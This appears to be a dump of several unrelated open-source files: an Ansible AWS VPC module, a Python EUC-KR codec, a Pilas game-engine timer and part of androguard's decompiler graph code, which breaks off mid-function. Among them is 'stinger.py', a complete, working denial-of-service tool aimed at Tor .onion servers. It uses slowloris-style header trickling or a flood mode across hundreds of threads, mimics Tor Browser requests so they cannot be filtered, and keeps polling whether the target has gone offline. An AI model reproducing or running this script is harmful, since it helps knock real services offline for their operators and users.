route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
route_kwargs['destination_cidr_block'] = route['dest']
local_routes.append(route_kwargs)
for j in rt.routes:
remote_routes.append(j.__dict__)
match = []
for i in local_routes:
change = "false"
for j in remote_routes:
if set(i.items()).issubset(set(j.items())):
change = "true"
match.append(change)
if 'false' in match:
return False
else:
return True
def rtb_changed(route_tables=None, vpc_conn=None, module=None, vpc=None, igw=None):
"""
Checks if the remote routes match the local routes.
route_tables : Route_tables parameter in the module
vpc_conn : The VPC conection object
module : The module object
vpc : The vpc object for this route table
igw : The internet gateway object for this vpc
Returns:
True when there is difference between the provided routes and remote routes and if subnet associations are different.
False when both routes and subnet associations matched.
"""
#We add a one for the main table
rtb_len = len(route_tables) + 1
remote_rtb_len = len(vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id}))
if remote_rtb_len != rtb_len:
return True
for rt in route_tables:
rt_id = None
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
nrt = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id, 'association.subnet-id': rsn[0].id})
if not nrt:
return True
else:
nrt = nrt[0]
if not rt_id:
rt_id = nrt.id
if not routes_match(rt['routes'], nrt, igw):
return True
continue
else:
if rt_id == nrt.id:
continue
else:
return True
return True
return False
def create_vpc(module, vpc_conn):
"""
Creates a new or modifies an existing VPC.
module : AnsibleModule object
vpc_conn: authenticated VPCConnection connection object
Returns:
A dictionary with information
about the VPC and subnets that were launched
"""
id = module.params.get('vpc_id')
cidr_block = module.params.get('cidr_block')
instance_tenancy = module.params.get('instance_tenancy')
dns_support = module.params.get('dns_support')
dns_hostnames = module.params.get('dns_hostnames')
subnets = module.params.get('subnets')
internet_gateway = module.params.get('internet_gateway')
route_tables = module.params.get('route_tables')
vpc_spec_tags = module.params.get('resource_tags')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check for existing VPC by cidr_block + tags or id
previous_vpc = find_vpc(module, vpc_conn, id, cidr_block)
if previous_vpc is not None:
changed = False
vpc = previous_vpc
else:
changed = True
try:
vpc = vpc_conn.create_vpc(cidr_block, instance_tenancy)
# wait here until the vpc is available
pending = True
wait_timeout = time.time() + wait_timeout
while wait and wait_timeout > time.time() and pending:
try:
pvpc = vpc_conn.get_all_vpcs(vpc.id)
if hasattr(pvpc, 'state'):
if pvpc.state == "available":
pending = False
elif hasattr(pvpc[0], 'state'):
if pvpc[0].state == "available":
pending = False
# sometimes vpc_conn.create_vpc() will return a vpc that can't be found yet by vpc_conn.get_all_vpcs()
# when that happens, just wait a bit longer and try again
except boto.exception.BotoServerError, e:
if e.error_code != 'InvalidVpcID.NotFound':
raise
if pending:
time.sleep(5)
if wait and wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "wait for vpc availability timeout on %s" % time.asctime())
except boto.exception.BotoServerError, e:
module.fail_json(msg = "%s: %s" % (e.error_code, e.error_message))
# Done with base VPC, now change to attributes and features.
# Add resource tags
vpc_tags = dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': vpc.id}))
if not set(vpc_spec_tags.items()).issubset(set(vpc_tags.items())):
new_tags = {}
for (key, value) in set(vpc_spec_tags.items()):
if (key, value) not in set(vpc_tags.items()):
new_tags[key] = value
if new_tags:
vpc_conn.create_tags(vpc.id, new_tags)
# boto doesn't appear to have a way to determine the existing
# value of the dns attributes, so we just set them.
# It also must be done one at a time.
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_support=dns_support)
vpc_conn.modify_vpc_attribute(vpc.id, enable_dns_hostnames=dns_hostnames)
# Process all subnet properties
if subnets is not None:
if not isinstance(subnets, list):
module.fail_json(msg='subnets needs to be a list of cidr blocks')
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
# First add all new subnets
for subnet in subnets:
add_subnet = True
subnet_tags_current = True
new_subnet_tags = subnet.get('resource_tags', None)
subnet_tags_delete = []
for csn in current_subnets:
if subnet['cidr'] == csn.cidr_block:
add_subnet = False
# Check if AWS subnet tags are in playbook subnet tags
subnet_tags_extra = (set(csn.tags.items()).issubset(set(new_subnet_tags.items())))
# Check if subnet tags in playbook are in AWS subnet tags
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_extra is False:
try:
for item in csn.tags.items():
if item not in new_subnet_tags.items():
subnet_tags_delete.append(item)
subnet_tags_delete = [key[0] for key in subnet_tags_delete]
delete_subnet_tag = vpc_conn.delete_tags(csn.id, subnet_tags_delete)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete resource tag, error {0}'.format(e))
# Add new subnet tags if not current
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_current is not True:
try:
changed = True
create_subnet_tag = vpc_conn.create_tags(csn.id, new_subnet_tags)
except EC2ResponseError, e:
module.fail_json(msg='Unable to create resource tag, error: {0}'.format(e))
if add_subnet:
try:
new_subnet = vpc_conn.create_subnet(vpc.id, subnet['cidr'], subnet.get('az', None))
new_subnet_tags = subnet.get('resource_tags', None)
if new_subnet_tags:
# Sometimes AWS takes its time to create a subnet and so using new subnets's id
# to create tags results in exception.
# boto doesn't seem to refresh 'state' of the newly created subnet, i.e.: it's always 'pending'
# so i resorted to polling vpc_conn.get_all_subnets with the id of the newly added subnet
while len(vpc_conn.get_all_subnets(filters={ 'subnet-id': new_subnet.id })) == 0:
time.sleep(0.1)
vpc_conn.create_tags(new_subnet.id, new_subnet_tags)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create subnet {0}, error: {1}'.format(subnet['cidr'], e))
# Now delete all absent subnets
for csubnet in current_subnets:
delete_subnet = True
for subnet in subnets:
if csubnet.cidr_block == subnet['cidr']:
delete_subnet = False
if delete_subnet:
try:
vpc_conn.delete_subnet(csubnet.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete subnet {0}, error: {1}'.format(csubnet.cidr_block, e))
# Handle Internet gateway (create/delete igw)
igw = None
igw_id = None
igws = vpc_conn.get_all_internet_gateways(filters={'attachment.vpc-id': vpc.id})
if len(igws) > 1:
module.fail_json(msg='EC2 returned more than one Internet Gateway for id %s, aborting' % vpc.id)
if internet_gateway:
if len(igws) != 1:
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create Internet Gateway, error: {0}'.format(e))
else:
# Set igw variable to the current igw instance for use in route tables.
igw = igws[0]
else:
if len(igws) > 0:
try:
vpc_conn.detach_internet_gateway(igws[0].id, vpc.id)
vpc_conn.delete_internet_gateway(igws[0].id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete Internet Gateway, error: {0}'.format(e))
if igw is not None:
igw_id = igw.id
# Handle route tables - this may be worth splitting into a
# different module but should work fine here. The strategy to stay
# indempotent is to basically build all the route tables as
# defined, track the route table ids, and then run through the
# remote list of route tables and delete any that we didn't
# create. This shouldn't interrupt traffic in theory, but is the
# only way to really work with route tables over time that I can
# think of without using painful aws ids. Hopefully boto will add
# the replace-route-table API to make this smoother and
# allow control of the 'main' routing table.
if route_tables is not None:
rtb_needs_change = rtb_changed(route_tables, vpc_conn, module, vpc, igw)
if route_tables is not None and rtb_needs_change:
if not isinstance(route_tables, list):
module.fail_json(msg='route tables need to be a list of dictionaries')
# Work through each route table and update/create to match dictionary array
all_route_tables = []
for rt in route_tables:
try:
new_rt = vpc_conn.create_route_table(vpc.id)
new_rt_tags = rt.get('resource_tags', None)
if new_rt_tags:
vpc_conn.create_tags(new_rt.id, new_rt_tags)
for route in rt['routes']:
route_kwargs = {}
if route['gw'] == 'igw':
if not internet_gateway:
module.fail_json(
msg='You asked for an Internet Gateway ' \
'(igw) route, but you have no Internet Gateway'
)
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
vpc_conn.create_route(new_rt.id, route['dest'], **route_kwargs)
# Associate with subnets
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
rsn = rsn[0]
# Disassociate then associate since we don't have replace
old_rt = vpc_conn.get_all_route_tables(
filters={'association.subnet_id': rsn.id, 'vpc_id': vpc.id}
)
old_rt = [ x for x in old_rt if x.id != None ]
if len(old_rt) == 1:
old_rt = old_rt[0]
association_id = None
for a in old_rt.associations:
if a.subnet_id == rsn.id:
association_id = a.id
vpc_conn.disassociate_route_table(association_id)
vpc_conn.associate_route_table(new_rt.id, rsn.id)
all_route_tables.append(new_rt)
changed = True
except EC2ResponseError, e:
module.fail_json(
msg='Unable to create and associate route table {0}, error: ' \
'{1}'.format(rt, e)
)
# Now that we are good to go on our new route tables, delete the
# old ones except the 'main' route table as boto can't set the main
# table yet.
all_rts = vpc_conn.get_all_route_tables(filters={'vpc-id': vpc.id})
for rt in all_rts:
if rt.id is None:
continue
delete_rt = True
for newrt in all_route_tables:
if newrt.id == rt.id:
delete_rt = False
break
if delete_rt:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
break
try:
if not is_main:
vpc_conn.delete_route_table(rt.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete old route table {0}, error: {1}'.format(rt.id, e))
vpc_dict = get_vpc_info(vpc)
created_vpc_id = vpc.id
returned_subnets = []
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
for sn in current_subnets:
returned_subnets.append({
'resource_tags': dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': sn.id})),
'cidr': sn.cidr_block,
'az': sn.availability_zone,
'id': sn.id,
})
if subnets is not None:
# Sort subnets by the order they were listed in the play
order = {}
for idx, val in enumerate(subnets):
order[val['cidr']] = idx
# Number of subnets in the play
subnets_in_play = len(subnets)
returned_subnets.sort(key=lambda x: order.get(x['cidr'], subnets_in_play))
return (vpc_dict, created_vpc_id, returned_subnets, igw_id, changed)
def terminate_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Terminates a VPC
module: Ansible module object
vpc_conn: authenticated VPCConnection connection object
vpc_id: a vpc id to terminate
cidr: The cidr block of the VPC - can be used in lieu of an ID
Returns a dictionary of VPC information
about the VPC terminated.
If the VPC to be terminated is available
"changed" will be set to True.
"""
vpc_dict = {}
terminated_vpc_id = ''
changed = False
vpc = find_vpc(module, vpc_conn, vpc_id, cidr)
if vpc is not None:
if vpc.state == 'available':
terminated_vpc_id=vpc.id
vpc_dict=get_vpc_info(vpc)
try:
subnets = vpc_conn.get_all_subnets(filters={'vpc_id': vpc.id})
for sn in subnets:
vpc_conn.delete_subnet(sn.id)
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc.id}
)
for igw in igws:
vpc_conn.detach_internet_gateway(igw.id, vpc.id)
vpc_conn.delete_internet_gateway(igw.id)
rts = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id})
for rt in rts:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
if not is_main:
vpc_conn.delete_route_table(rt.id)
vpc_conn.delete_vpc(vpc.id)
except EC2ResponseError, e:
module.fail_json(
msg='Unable to delete VPC {0}, error: {1}'.format(vpc.id, e)
)
changed = True
vpc_dict['state'] = "terminated"
return (changed, vpc_dict, terminated_vpc_id)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
cidr_block = dict(),
instance_tenancy = dict(choices=['default', 'dedicated'], default='default'),
wait = dict(type='bool', default=False),
wait_timeout = dict(default=300),
dns_support = dict(type='bool', default=True),
dns_hostnames = dict(type='bool', default=True),
subnets = dict(type='list'),
vpc_id = dict(),
internet_gateway = dict(type='bool', default=False),
resource_tags = dict(type='dict', required=True),
route_tables = dict(type='list'),
state = dict(choices=['present', 'absent'], default='present'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
# If we have a region specified, connect to its endpoint.
if region:
try:
vpc_conn = boto.vpc.connect_to_region(
region,
**aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg = str(e))
else:
module.fail_json(msg="region must be specified")
igw_id = None
if module.params.get('state') == 'absent':
vpc_id = module.params.get('vpc_id')
cidr = module.params.get('cidr_block')
(changed, vpc_dict, new_vpc_id) = terminate_vpc(module, vpc_conn, vpc_id, cidr)
subnets_changed = None
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning a new VPC
(vpc_dict, new_vpc_id, subnets_changed, igw_id, changed) = create_vpc(module, vpc_conn)
module.exit_json(changed=changed, vpc_id=new_vpc_id, vpc=vpc_dict, igw_id=igw_id, subnets=subnets_changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| gpl-3.0 |
vicky2135/lucious | lib/python2.7/encodings/euc_kr.py | 816 | 1027 | #
# euc_kr.py: Python Unicode Codec for EUC_KR
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('euc_kr')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_kr',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
| bsd-3-clause |
whitepacket/Stinger-Tor | stinger.py | 1 | 6382 | #!/usr/bin/env python
#Stinger-Tor
#Function names are written in the order metasploit launches attacks: RECON - EXPLOIT - PAYLOAD - LOOT for entertainment purposes.
#Requires Socksipy (socks.py) in the current directory. Download it from here: https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py
#I'm not responsible for any damages or consequences resulting from the use of this script, you are.
#For legal, research purposes only!
import os, socks, argparse, time, random, re, thread
parser = argparse.ArgumentParser(description='Tor server (.onion) unblockable DoS tool') #Basic CLI arguments.
parser.add_argument('-s', help="Host (.onion) to attack")
parser.add_argument('-p', default=80, help="Host port to flood (default: 80)")
parser.add_argument('-t', default=256, help="Attack threads (default: 256, max: 376)")
parser.add_argument('-tp', default=9050, help="Tor port on (default: 9050). Use 9150 when using the Tor Browser Bundle.")
parser.add_argument('-m', default='slow', help="Method. 1: slowget, 2: flood")
args = parser.parse_args()
if not args.s.lower().endswith(".onion"): #Only onion addresses accepted.
print "Error: server specified is not hosted under Tor."
exit(1)
elif not len(list(args.s.lower())) == 22:
print "Error: server specified is not hosted under Tor."
exit(1)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", int(args.tp))
except e as Exception:
print "Error: Tor port is not an integer."
exit(1)
exploit = ("GET / HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Connection: keep-alive\r\n\r\n"
% (args.s)) #Exact replica of the HTTP request sent by the Tor Browser Bundle, filtering this request will be DoS in itself.
# update: you will want to change the user agent to the latest Tor Browser UA or just copy a full request using Live HTTP Headers or Wireshark so it stays identical.
def payload(s, exploit): #floods the open socket with GET requests till it closes (if ever), or opens as many sockets as possible and slowly sends the HTTP headers.
if args.m.lower().startswith("slow") or args.m.lower() == '1':
while 1:
for header in exploit:
s.send(header)
time.sleep(random.randrange(5,20))
else:
while 1:
s.send(exploit)
def recon(host, port, exploit):
while 1:
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((host, port))
payload(s,exploit)
except:
pass
if int(args.tp) < 1: #Make sure all options were typed correctly...
print "Error: invalid tor port."
exit(1)
elif int(args.tp) > 65535:
print "Error: tor port too large."
exit(1)
elif int(args.p) < 1:
print "Error: invalid server port."
exit(1)
elif int(args.t) < 1:
print "Error: too little threads."
exit(1)
elif int(args.t) > 376:
print "Error: too many threads. maximum is 376."
exit(1)
elif int(args.p) > 65535:
print "Error: server port too large."
exit(1)
method = "SlowGET" #Below is basically a summary of the user-specified settings and what's taking place.
if not args.m.lower().startswith('slow') and not args.m == "1":
method = "Flooder"
print '*********************************'
print '* [stinger] *'
print '* initiating stress test.. *'
print '* -stress test details- *'
print '* host: '+args.s+' *'
nex = '* server port: '+str(args.p)
for x in range(0,15 - len(list(str(args.p))) + 1):
nex += " "
nex += "*"
print nex
nex = '* tor port: '+str(args.tp)
for x in range(0,18 - len(list(str(args.tp))) + 1):
nex += " "
nex += "*"
print nex
print '* DoS ETA: 1 minute *'
print '* method: '+method+' *'
nex = '* threads: '+str(args.t)
if int(args.t) > 99:
for x in range(0,17):
nex += " "
elif int(args.t) < 100 and int(args.t) > 9:
for x in range(0,18):
nex += " "
else:
for x in range(0,19):
nex += " "
nex += "*"
print nex
print '*********************************'
time.sleep(3)
print 'starting threads...'
time.sleep(3)
for x in range(0,int(args.t)):
try:
thread.start_new_thread(recon, (args.s, int(args.p), exploit))
print 'Thread: '+str(x+1)+' started.'
except:
print "Error: maximum threads reached. attack will still continue."
break
print 'threads started.'
time.sleep(2)
print "initiating server status checker." #Here we repeatedly check the server status in order to know weather or not our DoS is succeeding.
while 1: #it might be a good idea to develop something to escape this loop, so we don't need to kill the Python process.
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((args.s, int(args.p)))
s.send(exploit)
r = s.recv(256)
s.close() #it might be a good idea to use more specified error messages to avoid false positives, however, this is sufficient most of the time.
if 'network read timeout' in r.lower() or 'network connect timeout' in r.lower() or 'origin connection time-out' in r.lower() or 'unknown error' in r.lower() or 'bandwidth limit exceeded' in r.lower() or 'gateway timeout' in r.lower() or 'service unavaliable' in r.lower() or 'bad gateway' in r.lower() or 'internal server error' in r.lower() or 'no response' in r.lower() or 'too many requests' in r.lower() or 'request timeout' in r.lower():
#detects when the server software is under denial of service, but the server is still responsive.
#598 Network read timeout - 599 Network connect timeout - 522 Origin Connection Time-out - 520 Unknown Error - 509 Bandwidth Limit - 504 Gateway Timeout - 503 Service Unavaliable - 502 Bad Gateway - 500 Internal Server Error - 444 No Response - 429 Too Many Requests - 408 Request Timeout
print 'Server offline: returning error responses.'
else:
print 'Server is online.'
except:
print 'Server offline: unable to connect to TCP port, or receive HTTP response.'
| mpl-2.0 |
DrDub/pilas | pilas/actores/temporizador.py | 5 | 2558 | # -*- encoding: utf-8 -*-
# For Pilas engine - A video game framework.
#
# Copyright 2010 - Pablo Garrido
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
#
import pilas
from pilas.actores import Texto
from pilas import colores
class Temporizador(Texto):
"""Representa un contador de tiempo con cuenta regresiva.
Por ejemplo:
>>> t = pilas.actores.Temporizador()
>>> def hola_mundo():
... pilas.avisar("Hola mundo, pasaron 10 segundos...")
...
>>> t.ajustar(10, hola_mundo)
>>> t.iniciar()
"""
def __init__(self, x=0, y=0, color=colores.negro, fuente=None,
autoeliminar=False):
"""Inicializa el temporizador.
:param x: Posición horizontal.
:param y: Posición vertical.
:param color: El color que tendrá el texto.
:param autoeliminar: Indica si se desea eliminar el Temporizador
cuando acabe.
"""
Texto.__init__(self, '0', x=x, y=y, fuente=fuente)
self.ajustar(1, self.funcion_vacia)
self.color = color
self.autoeliminar = autoeliminar
# funcion cuando no se ajusta temporizador
def funcion_vacia(self):
pass
def definir_tiempo_texto(self, variable):
"""Define el texto a mostrar en el temporizador.
:param variable: La cadena de texto a mostrar.
"""
self.texto = str(variable)
# con la funcion ajustar manipulamos el tiempo y la
# funcion queremos ejecutar
def ajustar(self, tiempo=1, funcion=None):
"""Indica una funcion para ser invocada en el tiempo indicado.
La función no tiene que recibir parámetros, y luego de
ser indicada se tiene que iniciar el temporizador.
"""
self.tiempo = tiempo
self.definir_tiempo_texto(self.tiempo)
if funcion == None:
self.funcion = self.funcion_vacia()
else:
self.funcion = funcion
def _restar_a_contador(self):
if self.tiempo != 0:
self.tiempo -= 1
self.definir_tiempo_texto(self.tiempo)
return True
def autoeliminar_al_terminar(self):
self.funcion()
if self.autoeliminar:
self.eliminar()
def iniciar(self):
"""Inicia el contador de tiempo con la función indicada."""
pilas.mundo.agregar_tarea_una_vez(self.tiempo, self.autoeliminar_al_terminar)
pilas.mundo.agregar_tarea_siempre(1, self._restar_a_contador)
| lgpl-3.0 |
dandycheung/androguard | androguard/decompiler/dad/graph.py | 34 | 17082 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <[email protected]>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
from androguard.decompiler.dad.basic_blocks import (build_node_from_block,
StatementBlock, CondBlock)
from androguard.decompiler.dad.instruction import Variable
logger = logging.getLogger('dad.graph')
class Graph():
def __init__(self):
self.entry = None
self.exit = None
self.nodes = list()
self.rpo = []
self.edges = defaultdict(list)
self.catch_edges = defaultdict(list)
self.reverse_edges = defaultdict(list)
self.reverse_catch_edges = defaultdict(list)
self.loc_to_ins = None
self.loc_to_node = None
def sucs(self, node):
return self.edges.get(node, [])
def all_sucs(self, node):
return self.edges.get(node, []) + self.catch_edges.get(node, [])
def preds(self, node):
return [n for n in self.reverse_edges.get(node, [])
if not n.in_catch]
def all_preds(self, node):
return (self.reverse_edges.get(node, []) +
self.reverse_catch_edges.get(node, []))
def add_node(self, node):
self.nodes.append(node)
def add_edge(self, e1, e2):
lsucs = self.edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def add_catch_edge(self, e1, e2):
lsucs = self.catch_edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_catch_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def remove_node(self, node):
preds = self.reverse_edges.pop(node, [])
for pred in preds:
self.edges[pred].remove(node)
succs = self.edges.pop(node, [])
for suc in succs:
self.reverse_edges[suc].remove(node)
exc_preds = self.reverse_catch_edges.pop(node, [])
for pred in exc_preds:
self.catch_edges[pred].remove(node)
exc_succs = self.catch_edges.pop(node, [])
for suc in exc_succs:
self.reverse_catch_edges[suc].remove(node)
self.nodes.remove(node)
if node in self.rpo:
self.rpo.remove(node)
del node
def number_ins(self):
self.loc_to_ins = {}
self.loc_to_node = {}
num = 0
for node in self.rpo:
start_node = num
num = node.number_ins(num)
end_node = num - 1
self.loc_to_ins.update(node.get_loc_with_ins())
self.loc_to_node[(start_node, end_node)] = node
def get_ins_from_loc(self, loc):
return self.loc_to_ins.get(loc)
def get_node_from_loc(self, loc):
for (start, end), node in self.loc_to_node.iteritems():
if start <= loc <= end:
return node
def remove_ins(self, loc):
ins = self.get_ins_from_loc(loc)
self.get_node_from_loc(loc).remove_ins(loc, ins)
self.loc_to_ins.pop(loc)
def split_if_nodes(self):
'''
Split IfNodes in two nodes, the first node is the header node, the
second one is only composed of the jump condition.
'''
node_map = {n: n for n in self.nodes}
to_update = set()
for node in self.nodes[:]:
if node.type.is_cond:
if len(node.get_ins()) > 1:
pre_ins = node.get_ins()[:-1]
last_ins = node.get_ins()[-1]
pre_node = StatementBlock('%s-pre' % node.name, pre_ins)
cond_node = CondBlock('%s-cond' % node.name, [last_ins])
node_map[node] = pre_node
node_map[pre_node] = pre_node
node_map[cond_node] = cond_node
pre_node.copy_from(node)
cond_node.copy_from(node)
for var in node.var_to_declare:
pre_node.add_variable_declaration(var)
pre_node.type.is_stmt = True
cond_node.true = node.true
cond_node.false = node.false
for pred in self.all_preds(node):
pred_node = node_map[pred]
# Verify that the link is not an exception link
if node not in self.sucs(pred):
self.add_catch_edge(pred_node, pre_node)
continue
if pred is node:
pred_node = cond_node
if pred.type.is_cond: # and not (pred is node):
if pred.true is node:
pred_node.true = pre_node
if pred.false is node:
pred_node.false = pre_node
self.add_edge(pred_node, pre_node)
for suc in self.sucs(node):
self.add_edge(cond_node, node_map[suc])
# We link all the exceptions to the pre node instead of the
# condition node, which should not trigger any of them.
for suc in self.catch_edges.get(node, []):
self.add_catch_edge(pre_node, node_map[suc])
if node is self.entry:
self.entry = pre_node
self.add_node(pre_node)
self.add_node(cond_node)
self.add_edge(pre_node, cond_node)
pre_node.update_attribute_with(node_map)
cond_node.update_attribute_with(node_map)
self.remove_node(node)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def simplify(self):
'''
Simplify the CFG by merging/deleting statement nodes when possible:
If statement B follows statement A and if B has no other predecessor
besides A, then we can merge A and B into a new statement node.
We also remove nodes which do nothing except redirecting the control
flow (nodes which only contains a goto).
'''
redo = True
while redo:
redo = False
node_map = {}
to_update = set()
for node in self.nodes[:]:
if node.type.is_stmt and node in self.nodes:
sucs = self.all_sucs(node)
if len(sucs) != 1:
continue
suc = sucs[0]
if len(node.get_ins()) == 0:
if any(pred.type.is_switch
for pred in self.all_preds(node)):
continue
if node is suc:
continue
node_map[node] = suc
for pred in self.all_preds(node):
pred.update_attribute_with(node_map)
if node not in self.sucs(pred):
self.add_catch_edge(pred, suc)
continue
self.add_edge(pred, suc)
redo = True
if node is self.entry:
self.entry = suc
self.remove_node(node)
elif (suc.type.is_stmt and
len(self.all_preds(suc)) == 1 and
not (suc in self.catch_edges) and
not ((node is suc) or (suc is self.entry))):
ins_to_merge = suc.get_ins()
node.add_ins(ins_to_merge)
for var in suc.var_to_declare:
node.add_variable_declaration(var)
new_suc = self.sucs(suc)[0]
if new_suc:
self.add_edge(node, new_suc)
for exception_suc in self.catch_edges.get(suc, []):
self.add_catch_edge(node, exception_suc)
redo = True
self.remove_node(suc)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def compute_rpo(self):
'''
Number the nodes in reverse post order.
An RPO traversal visit as many predecessors of a node as possible
before visiting the node itself.
'''
nb = len(self.nodes) + 1
for node in self.post_order():
node.num = nb - node.po
self.rpo = sorted(self.nodes, key=lambda n: n.num)
def post_order(self):
'''
Return the nodes of the graph in post-order i.e we visit all the
children of a node before visiting the node itself.
'''
def _visit(n, cnt):
visited.add(n)
for suc in self.all_sucs(n):
if not suc in visited:
for cnt, s in _visit(suc, cnt):
yield cnt, s
n.po = cnt
yield cnt + 1, n
visited = set()
for _, node in _visit(self.entry, 1):
yield node
def draw(self, name, dname, draw_branches=True):
from pydot import Dot, Edge
g = Dot()
g.set_node_defaults(color='lightgray', style='filled', shape='box',
fontname='Courier', fontsize='10')
for node in sorted(self.nodes, key=lambda x: x.num):
if draw_branches and node.type.is_cond:
g.add_edge(Edge(str(node), str(node.true), color='green'))
g.add_edge(Edge(str(node), str(node.false), color='red'))
else:
for suc in self.sucs(node):
g.add_edge(Edge(str(node), str(suc), color='blue'))
for except_node in self.catch_edges.get(node, []):
g.add_edge(Edge(str(node), str(except_node),
color='black', style='dashed'))
g.write_png('%s/%s.png' % (dname, name))
def immediate_dominators(self):
return dom_lt(self)
def __len__(self):
return len(self.nodes)
def __repr__(self):
return str(self.nodes)
def __iter__(self):
for node in self.nodes:
yield node
def dom_lt(graph):
'''Dominator algorithm from Lengaeur-Tarjan'''
def _dfs(v, n):
semi[v] = n = n + 1
vertex[n] = label[v] = v
ancestor[v] = 0
for w in graph.all_sucs(v):
if not semi[w]:
parent[w] = v
n = _dfs(w, n)
pred[w].add(v)
return n
def _compress(v):
u = ancestor[v]
if ancestor[u]:
_compress(u)
if semi[label[u]] < semi[label[v]]:
label[v] = label[u]
ancestor[v] = ancestor[u]
def _eval(v):
if ancestor[v]:
_compress(v)
return label[v]
return v
def _link(v, w):
ancestor[w] = v
parent, ancestor, vertex = {}, {}, {}
label, dom = {}, {}
pred, bucket = defaultdict(set), defaultdict(set)
# Step 1:
semi = {v: 0 for v in graph.nodes}
n = _dfs(graph.entry, 0)
for i in xrange(n, 1, -1):
w = vertex[i]
# Step 2:
for v in pred[w]:
u = _eval(v)
y = semi[w] = min(semi[w], semi[u])
bucket[vertex[y]].add(w)
pw = parent[w]
_link(pw, w)
# Step 3:
bpw = bucket[pw]
while bpw:
v = bpw.pop()
u = _eval(v)
dom[v] = u if semi[u] < semi[v] else pw
# Step 4:
